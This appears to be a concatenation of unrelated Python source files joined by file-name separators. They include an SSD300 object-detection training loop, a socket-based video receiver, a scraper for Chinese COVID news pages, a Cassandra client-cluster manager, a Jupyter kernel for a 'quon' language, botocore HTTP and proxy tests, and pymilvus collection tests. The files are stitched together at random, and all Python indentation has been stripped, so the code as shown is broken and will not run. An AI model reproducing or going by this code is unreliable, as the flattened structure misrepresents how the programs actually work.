os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
import datetime
import tensorflow as tf
import numpy as np
import pickle
import threading
import matplotlib.pyplot as plt
from util.util import *
from tqdm import trange
from model.ssd300 import *
# ====================== Training Parameters ====================== #
BATCH_SIZE = 10
EPOCH = 200
EPOCH_LOSSES = []
SHUFFLED_INDECES = []
USE_MANGA109 = True
# ============================== END ============================== #
if __name__ == '__main__':
sess = tf.Session()
buff = []
if USE_MANGA109:
pickle_file = 'Manga109.pkl'
folder_name = 'Manga109/'
else:
pickle_file = 'VOC2007.pkl'
folder_name = 'voc2007/'
# load pickle data set annotation
with open(pickle_file, 'rb') as f:
data = pickle.load(f)
keys = sorted(data.keys())
BATCH = int(len(keys) / BATCH_SIZE)
def next_batch():
global buff, BATCH_SIZE ,SHUFFLED_INDECES
mini_batch = []
actual_data = []
if 0 == len(SHUFFLED_INDECES):
SHUFFLED_INDECES = list(np.random.permutation(len(keys)))
indices = SHUFFLED_INDECES[:min(BATCH_SIZE, len(SHUFFLED_INDECES))]
del SHUFFLED_INDECES[:min(BATCH_SIZE, len(SHUFFLED_INDECES))]
for idx in indices:
# make images mini batch
img, _, _, _, = preprocess(folder_name + keys[idx])
actual_data.append(data[keys[idx]])
mini_batch.append(img)
buff.append((mini_batch, actual_data))
# tensorflow session
ssd = SSD300(sess)
sess.run(tf.global_variables_initializer())
# parameter saver
saver = tf.train.Saver()
# saver.restore(sess, './checkpoints/params.ckpt')
SHUFFLED_INDECES = list(np.random.permutation(len(keys)))
print('\nSTART LEARNING')
print('==================== '+str(datetime.datetime.now())+' ====================')
for _ in range(5):
next_batch()
for ep in range(EPOCH):
BATCH_LOSSES = []
for ba in trange(BATCH):
batch, actual = buff.pop(0)
threading.Thread(name='load', target=next_batch).start()
_, _, batch_loc, batch_conf, batch_loss = ssd.train(batch, actual)
BATCH_LOSSES.append(batch_loss)
# print('BATCH: {0} / EPOCH: {1}, LOSS: {2}'.format(ba+1, ep+1, batch_loss))
EPOCH_LOSSES.append(np.mean(BATCH_LOSSES))
print('\n*** AVERAGE: '+str(EPOCH_LOSSES[-1])+' ***')
saver.save(sess, './checkpoints/params.ckpt')
print('\n========== EPOCH: '+str(ep+1)+' END ==========')
print('\nEND LEARNING')
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.plot(np.array(range(EPOCH)), EPOCH_LOSSES)
plt.grid()
plt.savefig("loss.png")
plt.show()
print('==================== '+str(datetime.datetime.now())+' ====================')
|
Process.py
|
import threading
class ProcessParallel(object):
#Thanks https://stackoverflow.com/questions/11968689/python-multithreading-wait-till-all-threads-finished
def __init__(self, *jobs):
self.jobs = jobs
self.processes = []
self.processes_url = []
self.processes_extra = []
def append_process(self, *job, url=None, extra=None):
self.jobs = self.jobs + job
if (url != None and extra != None):
self.processes_url.append(url)
self.processes_extra.append(extra)
def fork_processes(self):
count = -1
for job in self.jobs:
try:
if (count == -1):
proc = threading.Thread(target=job)
self.processes.append(proc)
count+=1
else:
proc = threading.Thread(target=job, args=(self.processes_url[count], self.processes_extra[count]))
self.processes.append(proc)
count+=1
except Exception:
pass
def start_all(self):
for proc in self.processes:
proc.start()
def join_all(self):
for proc in self.processes:
proc.join()
|
videoGet.py
|
from threading import Thread
import socket
import struct
import time
class VideoGet():
def __init__(self, ui):
self.HOST = "169.254.196.68"
self._PORT = 8485
self.frame_data_send = ""
self._ui = ui
def connect(self):
while True:
if self._ui.camera_var == 0:
self._ui.st_cameratype_lb_text = "Close"
time.sleep(1)
continue
elif self._ui.camera_var == 1:
self._ui.st_cameratype_lb_text = "Front is Waiting"
self._PORT = 8480
elif self._ui.camera_var == 2:
self._ui.st_cameratype_lb_text = "Bottom is Waiting"
self._PORT = 8485
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.settimeout(1)
print('Socket created Video_Getter')
try:
self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.s.bind((self.HOST, self._PORT))
print("self.host", self._PORT)
print('Socket bind complete Video_Getter')
self.connected = True
self.msg = "Connection is Completed Video_Getter"
self.s.listen(10)
print('Socket now listening Video_Getter')
self.conn, self.addr = self.s.accept()
self.connected = True
if self._ui.camera_var == 1:
self._ui.st_cameratype_lb_text = "Front is Open"
elif self._ui.camera_var == 2:
self._ui.st_cameratype_lb_text = "Bottom is Open"
break
except socket.error as msg:
print(msg, " in Video_Getter ")
self.msg = "Try to Connect"
time.sleep(1)
self.data = b""
self.payload_size = struct.calcsize(">L")
def start(self):
Thread(target=self.get, args=()).start()
return self
def get(self):
self.connect()
start = time.time()
while True:
if time.time() - start > 1:
start = time.time()
while len(self.data) < self.payload_size:
self.data += self.conn.recv(4096)
if self.data == b'':
if self.connected == True:
start = time.time()
self.connected = False
if self.connected == False and time.time() > 1:
self.connect()
packed_msg_size = self.data[:self.payload_size]
self.data = self.data[self.payload_size:]
msg_size = struct.unpack(">L", packed_msg_size)[0]
while len(self.data) < msg_size:
self.data += self.conn.recv(4096)
if self.data == b'':
if self.connected:
start = time.time()
self.connected = False
if not self.connected and time.time() > 1:
self.connect()
self.frame_data = self.data[:msg_size]
self.frame_data_send = self.frame_data
self.data = self.data[msg_size:]
if self._ui.camera_var == 0:
self.conn.close()
self.s.close()
self.connect()
|
demo.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import requests
import json
import time
from lxml import etree
import threading
headers = {
"user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
}
News_set = set()
def getData():
# url = "https://news.163.com/special/epidemic/"
url = "https://wp.m.163.com/163/page/news/virus_report/index.html"
html = requests.get(url, headers=headers)
soup = etree.HTML(html.text)
cover_data = soup.xpath(
'//div[@class="cover_data_china"]/div[starts-with(@class,"cover")]'
)
# current_time = soup.xpath('//div[@class="cover_li"]/span/text()')[0]
current_time = soup.xpath('//div[@class="cover_time"]/text()')[0]
# XPath 语法: //div[@class="cover_data"]/div[starts-with(@class,"cover")]/div[@class="number"]
print(current_time)
# while True:
for cover in cover_data:
title = cover.xpath("h4/text()")[0]
number = cover.xpath('div[@class="number"]/text()')[0]
result = current_time + "" + title + "" + number
# print(result)
if result not in News_set:
News_set.add(result)
print(title, number, end=" ")
# time.sleep(60*1)
def getNews():
url = "https://opendata.baidu.com/data/inner?tn=reserved_all_res_tn&dspName=iphone&from_sf=1&dsp=iphone&resource_id=28565&alr=1&query=%E8%82%BA%E7%82%8E&cb=jsonp_1580992074077_99412"
html = requests.get(url, headers=headers)
html_text = html.text
# print(html_text)
start = html_text.find('{"ResultCode":')
end = html_text.find(r'k_recall_srcids\u0000\u0000"}"}')
# print(str(start) + ":" + str(end))
#
json_data = json.loads(html_text[start:end])
# print(json_data['Result'][0]['DisplayData']['result']['items'])
data_news = json_data["Result"][0]["DisplayData"]["result"]["items"]
# while True:
for data in data_news:
news_title = data["eventDescription"]
news_time = data["eventTime"]
current_time = time.strftime(
"%Y-%m-%d %H:%M:%S", time.localtime(int(news_time))
)
url = data["eventUrl"]
site = data["siteName"]
print(url)
result = news_title + " 时间为: " + current_time + " 网站为: " + site
print(result)
# time.sleep(60*1)
def main():
getData()
# getNews()
# threading.Thread(target=getData()).start()
# threading.Thread(target=getNews()).start()
if __name__ == "__main__":
main()
|
ClientsCluster.py
|
__author__ = 'cmantas'
_author__ = 'cmantas'
from Node import Node
from VM import get_all_vms
from json import loads, dumps
from os import remove
from os.path import isfile
from lib.persistance_module import get_script_text, env_vars
from lib.tiramola_logging import get_logger
from threading import Thread
from lib.Cluster import *
class Clients(Cluster):
"""
Represents the Clients Cluster
"""
orchestrator = None # the VM to which the others report to
# the flavor and image for this cluster's VMs
flavor = env_vars["client_flavor"]
image = env_vars["cassandra_base_image"]
def __init__(self):
super(Clients, self).__init__()
self.cluster_name = "clients"
self.node_type = "client"
# the save file for saving/reloading the active cluster
self.save_file = home+"files/saved_%s_cluster.json" % self.cluster_name
# the logger for this file
self.log = get_logger('CLIENTS', 'INFO', logfile=home+'files/logs/Coordinator.log')
def find_orchestrator(self):
in_nodes = Node.get_all_nodes(check_active=True)
for n in in_nodes:
if "orchestrator" in n.name:
global orchestrator
orchestrator = n
return
def resume_cluster(self):
"""
Re-loads the cluster representation based on the VMs pre-existing on the IaaS and the 'save_file'
"""
self.log.info("Loading info from the IaaS")
if not isfile(self.save_file):
self.log.info("No existing created cluster")
saved_nodes = []
else:
saved_cluster = loads(open(self.save_file, 'r').read())
saved_nodes = saved_cluster['clients']
in_nodes = Node.get_all_nodes(check_active=True)
for n in in_nodes:
if n.name not in saved_nodes:
if "orchestrator" in n.name:
global orchestrator
orchestrator = n
self.log.debug('Found orchestrator %s' % n.name)
continue
else:
self.all_nodes.append(n)
#sort nodes by name
self.all_nodes.sort(key=lambda x: x.name)
def save_cluster(self):
"""
Creates/Saves the 'save_file'
:return:
"""
cluster = dict()
cluster["clients"] = [c.name for c in self.all_nodes]
string = dumps(cluster, indent=3)
f = open(self.save_file, 'w+')
f.write(string)
def create_cluster(self, count=1):
self.all_nodes = []
for i in range(count):
self.all_nodes.append(Node(self.cluster_name, node_type=self.node_type, number="%02d" % (i+1), create=True, IPv4=True,
flavor=self.flavor, image=self.image))
#save the cluster to file
self.save_cluster()
#wait until everybody is ready
self.wait_everybody()
self.find_orchestrator()
self.inject_hosts_files()
self.log.info('Every node is ready for SSH')
def inject_hosts_files(self):
"""
Creates a mapping of hostname -> IP for all the nodes in the cluster and injects it to all Nodes so that they
know each other by hostname. Also restarts the ganglia daemons
:return:
"""
self.log.info("Injecting host files")
hosts = dict()
for i in self.all_nodes:
hosts[i.name] = i.get_public_addr()
#add the host names to etc/hosts
orchestrator.inject_hostnames(hosts, delete=self.cluster_name)
for i in self.all_nodes:
i.inject_hostnames(hosts, delete=self.cluster_name)
self.all_nodes[0].run_command("service ganglia-monitor restart; service gmetad restart", silent=True)
orchestrator.run_command("service ganglia-monitor restart; service gmetad restart", silent=True)
def add_nodes(self, count=1):
"""
Adds a node to the cassandra cluster. Refreshes the hosts in all nodes
:return:
"""
self.log.info('Adding %d nodes' % count)
new_nodes = []
Node.flavor = env_vars['client_flavor']
for i in range(count):
#check if cluster did not previously exist
if i == 0 and len(self.all_nodes) == 0:
# give a floating IPv4 to the first node only
new_guy = Node(self.cluster_name, '', len(self.all_nodes)+1, create=True, IPv4=True)
else:
new_guy = Node(self.cluster_name, node_type="", number=len(self.all_nodes)+1, create=True)
self.all_nodes.append(new_guy)
new_nodes.append(new_guy)
self.save_cluster()
for n in new_nodes:
n.wait_ready()
#inject host files to everybody
n.inject_hostnames(self.get_hosts(private=True), delete=self.cluster_name)
n.bootstrap()
self.log.info("Node %s is live " % new_guy.name)
#inform all
self.inject_hosts_files()
def remove_nodes(self, count=1):
"""
Removes a node from the cassandra cluster. Refreshes the hosts in all nodes
:return:
"""
for i in range(count):
dead_guy = self.all_nodes.pop()
self.log.info("Removing node %s" % dead_guy.name)
dead_guy.decommission()
self.log.info("Client %s is removed" % dead_guy.name)
self.save_cluster()
self.inject_hosts_files()
def run(self, params):
self.bootstrap_cluster()
run_type = params['type']
servers = params['servers']
self.update_hostfiles(servers)
#choose type of run and do necessary actions
if run_type=='stress':
for c in self.all_nodes:
load_command = get_script_text(self.cluster_name, self.node_type, "run")
self.log.info("running stress workload on %s" % c.name)
c.run_command(load_command, silent=True)
elif run_type == 'sinusoid':
global env_vars
target = int(params['target']) / len(self.all_nodes)
offset = int(params['offset']) / len(self.all_nodes)
period = 60*int(params['period'])
threads = int(env_vars['client_threads'])
for c in self.all_nodes:
load_command = get_script_text(self.cluster_name, self.node_type, "run_sin") % (target, offset, period, threads)
#load_command += get_script_text(cluster_name, "", "run_sin") % (target, offset, period)
self.log.info("running sinusoid on %s" % c.name)
c.run_command(load_command, silent=True)
elif run_type == 'load':
record_count = int(params['records'])
start = 0
step = record_count/len(self.all_nodes)
threads = []
for c in self.all_nodes:
#load_command = get_script_text(self.cluster_name, self.node_type, "load") % (str(record_count), str(step), str(start))
load_command = get_script_text(self.cluster_name, self.node_type, "load").format(record_count, step, start)
#load_command += get_script_text(cluster_name, "", "load") % (str(record_count), str(step), str(start))
self.log.info("running load phase on %s for %d of %d records" % (c.name, step, record_count))
t = Thread(target=c.run_command, args=(load_command,) )
threads.append(t)
t.start()
start += step
self.log.info("waiting for load phase to finish in clients")
for t in threads:
t.join()
self.log.info("load finished")
def destroy_all(self):
"""
Destroys all the VMs in the cluster (not the orchestrator)
"""
self.log.info("Destroying the %s cluster" % self.cluster_name)
for n in self.all_nodes:
n.destroy()
remove(self.save_file)
my_Clients = Clients()
# always runs
my_Clients.resume_cluster()
|
kernel.py
|
from queue import Queue
from threading import Thread
from ipykernel.kernelbase import Kernel
import re
import subprocess
import tempfile
import os
import os.path as path
class RealTimeSubprocess(subprocess.Popen):
"""
A subprocess that allows to read its stdout and stderr in real time
"""
def __init__(self, cmd, write_to_stdout, write_to_stderr):
"""
:param cmd: the command to execute
:param write_to_stdout: a callable that will be called with chunks of data from stdout
:param write_to_stderr: a callable that will be called with chunks of data from stderr
"""
self._write_to_stdout = write_to_stdout
self._write_to_stderr = write_to_stderr
super().__init__(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=0)
self._stdout_queue = Queue()
self._stdout_thread = Thread(target=RealTimeSubprocess._enqueue_output, args=(self.stdout, self._stdout_queue))
self._stdout_thread.daemon = True
self._stdout_thread.start()
self._stderr_queue = Queue()
self._stderr_thread = Thread(target=RealTimeSubprocess._enqueue_output, args=(self.stderr, self._stderr_queue))
self._stderr_thread.daemon = True
self._stderr_thread.start()
@staticmethod
def _enqueue_output(stream, queue):
"""
Add chunks of data from a stream to a queue until the stream is empty.
"""
for line in iter(lambda: stream.read(4096), b''):
queue.put(line)
stream.close()
def write_contents(self):
"""
Write the available content from stdin and stderr where specified when the instance was created
:return:
"""
def read_all_from_queue(queue):
res = b''
size = queue.qsize()
while size != 0:
res += queue.get_nowait()
size -= 1
return res
stdout_contents = read_all_from_queue(self._stdout_queue)
if stdout_contents:
self._write_to_stdout(stdout_contents)
stderr_contents = read_all_from_queue(self._stderr_queue)
if stderr_contents:
self._write_to_stderr(stderr_contents)
class QuonKernel(Kernel):
implementation = 'jupyter_quon_kernel'
implementation_version = '1.0'
language = 'quon'
language_version = 'quonSexpr'
language_info = {'name': 'quon',
'mimetype': 'text/plain',
'file_extension': '.qon'}
banner = "Quon kernel.\n" \
"Uses quon, compiles, and creates source code files and executables in temporary folder.\n"
def __init__(self, *args, **kwargs):
super(QuonKernel, self).__init__(*args, **kwargs)
self.files = []
mastertemp = tempfile.mkstemp(suffix='.out')
os.close(mastertemp[0])
self.master_path = mastertemp[1]
filepath = path.join(path.dirname(path.realpath(__file__)), 'resources', 'master.c')
subprocess.call(['jupyter.sh', filepath, self.master_path])
def cleanup_files(self):
"""Remove all the temporary files created by the kernel"""
for file in self.files:
os.remove(file)
os.remove(self.master_path)
def new_temp_file(self, **kwargs):
"""Create a new temp file to be deleted when the kernel shuts down"""
# We don't want the file to be deleted when closed, but only when the kernel stops
kwargs['delete'] = False
kwargs['mode'] = 'w'
file = tempfile.NamedTemporaryFile(**kwargs)
self.files.append(file.name)
return file
def _write_to_stdout(self, contents):
self.send_response(self.iopub_socket, 'stream', {'name': 'stdout', 'text': contents})
def _write_to_stderr(self, contents):
self.send_response(self.iopub_socket, 'stream', {'name': 'stderr', 'text': contents})
def create_jupyter_subprocess(self, cmd):
return RealTimeSubprocess(cmd,
lambda contents: self._write_to_stdout(contents.decode()),
lambda contents: self._write_to_stderr(contents.decode()))
def compile_with_gcc(self, source_filename, binary_filename, cflags=None, ldflags=None):
cflags = ['--ansi']
args = ['jupyter.sh', source_filename, binary_filename]
return self.create_jupyter_subprocess(args)
def _filter_magics(self, code):
magics = {'cflags': [],
'ldflags': [],
'args': []}
for line in code.splitlines():
if line.startswith('//%'):
key, value = line[3:].split(":", 2)
key = key.strip().lower()
if key in ['ldflags', 'cflags']:
for flag in value.split():
magics[key] += [flag]
elif key == "args":
# Split arguments respecting quotes
for argument in re.findall(r'(?:[^\s,"]|"(?:\\.|[^"])*")+', value):
magics['args'] += [argument.strip('"')]
return magics
def do_execute(self, code, silent, store_history=True,
user_expressions=None, allow_stdin=False):
magics = self._filter_magics(code)
with self.new_temp_file(suffix='.c') as source_file:
source_file.write(code)
source_file.flush()
with self.new_temp_file(suffix='.out') as binary_file:
p = self.compile_with_gcc(source_file.name, binary_file.name, magics['cflags'], magics['ldflags'])
while p.poll() is None:
p.write_contents()
p.write_contents()
if p.returncode != 0: # Compilation failed
self._write_to_stderr(
"[qon kernel] Qon exited with code {}, the executable will not be executed".format(
p.returncode))
return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [],
'user_expressions': {}}
p = self.create_jupyter_subprocess([self.master_path, binary_file.name] + magics['args'])
while p.poll() is None:
p.write_contents()
p.write_contents()
if p.returncode != 0:
self._write_to_stderr("[qon kernel] Executable exited with code {}".format(p.returncode))
return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}}
def do_shutdown(self, restart):
"""Cleanup the created source code files and executables when shutting down the kernel"""
self.cleanup_files()
|
test_client_http.py
|
import select
import socket
import contextlib
import threading
import mock
from tests import unittest
from contextlib import contextmanager
import botocore.session
from botocore.config import Config
from botocore.vendored.six.moves import BaseHTTPServer, socketserver
from botocore.exceptions import (
ConnectTimeoutError, ReadTimeoutError, EndpointConnectionError,
ConnectionClosedError, ClientError, ProxyConnectionError
)
from botocore.vendored.requests import exceptions as requests_exceptions
class TestClientHTTPBehavior(unittest.TestCase):
def setUp(self):
self.port = unused_port()
self.localhost = 'http://localhost:%s/' % self.port
self.session = botocore.session.get_session()
# We need to set fake credentials to ensure credentials aren't searched
# for which might make additional API calls (assume role, etc).
self.session.set_credentials('fakeakid', 'fakesecret')
@unittest.skip('Test has suddenly become extremely flakey.')
def test_can_proxy_https_request_with_auth(self):
proxy_url = 'http://user:pass@localhost:%s/' % self.port
config = Config(proxies={'https': proxy_url}, region_name='us-west-1')
client = self.session.create_client('ec2', config=config)
class AuthProxyHandler(ProxyHandler):
event = threading.Event()
def validate_auth(self):
proxy_auth = self.headers.get('Proxy-Authorization')
return proxy_auth == 'Basic dXNlcjpwYXNz'
try:
with background(run_server, args=(AuthProxyHandler, self.port)):
AuthProxyHandler.event.wait(timeout=60)
client.describe_regions()
except BackgroundTaskFailed:
self.fail('Background task did not exit, proxy was not used.')
@unittest.skip('Proxy cannot connect to service when run in CodeBuild.')
def test_proxy_request_includes_host_header(self):
proxy_url = 'http://user:pass@localhost:%s/' % self.port
config = Config(
proxies={'https': proxy_url},
proxies_config={'proxy_use_forwarding_for_https': True},
region_name='us-west-1'
)
environ = {'BOTO_EXPERIMENTAL__ADD_PROXY_HOST_HEADER': "True"}
self.environ_patch = mock.patch('os.environ', environ)
self.environ_patch.start()
client = self.session.create_client('ec2', config=config)
class ConnectProxyHandler(ProxyHandler):
event = threading.Event()
def do_CONNECT(self):
remote_host, remote_port = self.path.split(':')
# Ensure we're sending the correct host header in CONNECT
if self.headers.get('host') != remote_host:
self.send_response(400)
self.end_headers()
return
self.send_response(200)
self.end_headers()
remote_host, remote_port = self.path.split(':')
remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remote_socket.connect((remote_host, int(remote_port)))
self._tunnel(self.request, remote_socket)
remote_socket.close()
try:
with background(run_server, args=(ConnectProxyHandler, self.port)):
ConnectProxyHandler.event.wait(timeout=60)
client.describe_regions()
except BackgroundTaskFailed:
self.fail('Background task did not exit, proxy was not used.')
except ProxyConnectionError:
self.fail('Proxy CONNECT failed, unable to establish connection.')
except ClientError as e:
# Fake credentials won't resolve against service
# but we've successfully contacted through the proxy
assert e.response['Error']['Code'] == 'AuthFailure'
finally:
self.environ_patch.stop()
def _read_timeout_server(self):
config = Config(
read_timeout=0.1,
retries={'max_attempts': 0},
region_name='us-weast-2',
)
client = self.session.create_client('ec2', endpoint_url=self.localhost,
config=config)
client_call_ended_event = threading.Event()
class FakeEC2(SimpleHandler):
event = threading.Event()
msg = b'<response/>'
def get_length(self):
return len(self.msg)
def get_body(self):
client_call_ended_event.wait(timeout=60)
return self.msg
try:
with background(run_server, args=(FakeEC2, self.port)):
try:
FakeEC2.event.wait(timeout=60)
client.describe_regions()
finally:
client_call_ended_event.set()
except BackgroundTaskFailed:
self.fail('Fake EC2 service was not called.')
def test_read_timeout_exception(self):
with self.assertRaises(ReadTimeoutError):
self._read_timeout_server()
def test_old_read_timeout_exception(self):
with self.assertRaises(requests_exceptions.ReadTimeout):
self._read_timeout_server()
@unittest.skip('The current implementation will fail to timeout on linux')
def test_connect_timeout_exception(self):
config = Config(
connect_timeout=0.2,
retries={'max_attempts': 0},
region_name='us-weast-2',
)
client = self.session.create_client('ec2', endpoint_url=self.localhost,
config=config)
server_bound_event = threading.Event()
client_call_ended_event = threading.Event()
def no_accept_server():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('', self.port))
server_bound_event.set()
client_call_ended_event.wait(timeout=60)
sock.close()
with background(no_accept_server):
server_bound_event.wait(timeout=60)
with self.assertRaises(ConnectTimeoutError):
client.describe_regions()
client_call_ended_event.set()
def test_invalid_host_gaierror(self):
config = Config(retries={'max_attempts': 0}, region_name='us-weast-1')
endpoint = 'https://ec2.us-weast-1.amazonaws.com/'
client = self.session.create_client('ec2', endpoint_url=endpoint,
config=config)
with self.assertRaises(EndpointConnectionError):
client.describe_regions()
def test_bad_status_line(self):
config = Config(retries={'max_attempts': 0}, region_name='us-weast-2')
client = self.session.create_client('ec2', endpoint_url=self.localhost,
config=config)
class BadStatusHandler(BaseHTTPServer.BaseHTTPRequestHandler):
event = threading.Event()
def do_POST(self):
self.wfile.write(b'garbage')
with background(run_server, args=(BadStatusHandler, self.port)):
with self.assertRaises(ConnectionClosedError):
BadStatusHandler.event.wait(timeout=60)
client.describe_regions()
def unused_port():
with contextlib.closing(socket.socket()) as sock:
sock.bind(('127.0.0.1', 0))
return sock.getsockname()[1]
class SimpleHandler(BaseHTTPServer.BaseHTTPRequestHandler):
status = 200
def get_length(self):
return 0
def get_body(self):
return b''
def do_GET(self):
length = str(self.get_length())
self.send_response(self.status)
self.send_header('Content-Length', length)
self.end_headers()
self.wfile.write(self.get_body())
do_POST = do_PUT = do_GET
class ProxyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
tunnel_chunk_size = 1024
poll_limit = 10**4
def _tunnel(self, client, remote):
client.setblocking(0)
remote.setblocking(0)
sockets = [client, remote]
noop_count = 0
while True:
readable, writeable, _ = select.select(sockets, sockets, [], 1)
if client in readable and remote in writeable:
noop_count = 0
client_bytes = client.recv(self.tunnel_chunk_size)
if not client_bytes:
break
remote.sendall(client_bytes)
if remote in readable and client in writeable:
noop_count = 0
remote_bytes = remote.recv(self.tunnel_chunk_size)
if not remote_bytes:
break
client.sendall(remote_bytes)
if noop_count > self.poll_limit:
# We have a case where all communication has
# finished but we never saw an empty read.
# This will leave both sockets as writeable
# indefinitely. We'll force a break here if
# we've crossed our polling limit.
break
noop_count += 1
def do_CONNECT(self):
if not self.validate_auth():
self.send_response(401)
self.end_headers()
return
self.send_response(200)
self.end_headers()
remote_host, remote_port = self.path.split(':')
remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remote_socket.connect((remote_host, int(remote_port)))
self._tunnel(self.request, remote_socket)
remote_socket.close()
def validate_auth(self):
return True
class BackgroundTaskFailed(Exception):
pass
@contextmanager
def background(target, args=(), timeout=60):
thread = threading.Thread(target=target, args=args)
thread.daemon = True
thread.start()
try:
yield target
finally:
thread.join(timeout=timeout)
if thread.is_alive():
msg = 'Background task did not exit in a timely manner.'
raise BackgroundTaskFailed(msg)
def run_server(handler, port):
address = ('', port)
httpd = socketserver.TCPServer(address, handler, bind_and_activate=False)
httpd.allow_reuse_address = True
httpd.server_bind()
httpd.server_activate()
handler.event.set()
httpd.handle_request()
httpd.server_close()
|
test_collection.py
|
import numpy
import pandas as pd
import pytest
from pymilvus import DataType
from base.client_base import TestcaseBase
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from utils.utils import *
from common import constants as cons
prefix = "collection"
exp_name = "name"
exp_schema = "schema"
exp_num = "num_entities"
exp_primary = "primary"
exp_shards_num = "shards_num"
default_schema = cf.gen_default_collection_schema()
default_binary_schema = cf.gen_default_binary_collection_schema()
default_shards_num = 2
uid_count = "collection_count"
tag = "collection_count_tag"
uid_stats = "get_collection_stats"
uid_create = "create_collection"
uid_describe = "describe_collection"
uid_drop = "drop_collection"
uid_has = "has_collection"
uid_list = "list_collections"
uid_load = "load_collection"
field_name = default_float_vec_field_name
default_single_query = {
"data": gen_vectors(1, default_dim),
"anns_field": default_float_vec_field_name,
"param": {"metric_type": "L2", "params": {"nprobe": 10}},
"limit": default_top_k,
}
class TestCollectionParams(TestcaseBase):
""" Test case of collection interface """
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_none_removed_invalid_strings(self, request):
if request.param is None:
pytest.skip("None schema is valid")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_type_fields(self, request):
if isinstance(request.param, list):
pytest.skip("list is valid fields")
yield request.param
@pytest.fixture(scope="function", params=cf.gen_all_type_fields())
def get_unsupported_primary_field(self, request):
if request.param.dtype == DataType.INT64:
pytest.skip("int64 type is valid primary key")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_dim(self, request):
if request.param == 1:
pytest.skip("1 is valid dim")
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_collection(self):
"""
target: test collection with default schema
method: create collection with default schema
expected: assert collection property
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema, exp_num: 0,
exp_primary: ct.default_int64_field_name})
assert c_name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_collection_empty_name(self):
"""
target: test collection with empty name
method: create collection with an empty name
expected: raise exception
"""
self._connect()
c_name = ""
error = {ct.err_code: 1, ct.err_msg: f'`collection_name` value is illegal'}
self.collection_wrap.init_collection(c_name, schema=default_schema, check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not Milvus Exception")
@pytest.mark.parametrize("name", [[], 1, [1, "2", 3], (1,), {1: 1}, None])
def test_collection_illegal_name(self, name):
"""
target: test collection with illegal name
method: create collection with illegal name
expected: raise exception
"""
self._connect()
error = {ct.err_code: 1, ct.err_msg: "`collection_name` value {} is illegal".format(name)}
self.collection_wrap.init_collection(name, schema=default_schema, check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("name", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_name(self, name):
"""
target: test collection with invalid name
method: create collection with invalid name
expected: raise exception
"""
self._connect()
error = {ct.err_code: 1, ct.err_msg: "Invalid collection name: {}".format(name)}
self.collection_wrap.init_collection(name, schema=default_schema, check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_dup_name(self):
"""
target: test collection with dup name
method: create collection with dup name and none schema and data
expected: collection properties consistent
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.init_collection(collection_w.name)
assert collection_w.name == self.collection_wrap.name
assert collection_w.schema == self.collection_wrap.schema
assert collection_w.num_entities == self.collection_wrap.num_entities
assert collection_w.name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_with_desc(self):
"""
target: test collection with dup name
method: 1. default schema with desc 2. dup name collection
expected: desc consistent
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(description=ct.collection_desc)
collection_w = self.init_collection_wrap(name=c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
self.collection_wrap.init_collection(c_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
assert collection_w.description == self.collection_wrap.description
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_new_schema(self):
"""
target: test collection with dup name and new schema
method: 1.create collection with default schema
2. collection with dup name and new schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
fields = [cf.gen_int64_field(is_primary=True)]
schema = cf.gen_collection_schema(fields=fields)
error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
"schema passed in."}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_new_primary(self):
"""
target: test collection with dup name and new primary_field schema
method: 1.collection with default schema
2. collection with same fields and new primary_field schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field_one = cf.gen_int64_field()
int_field_two = cf.gen_int64_field(name="int2")
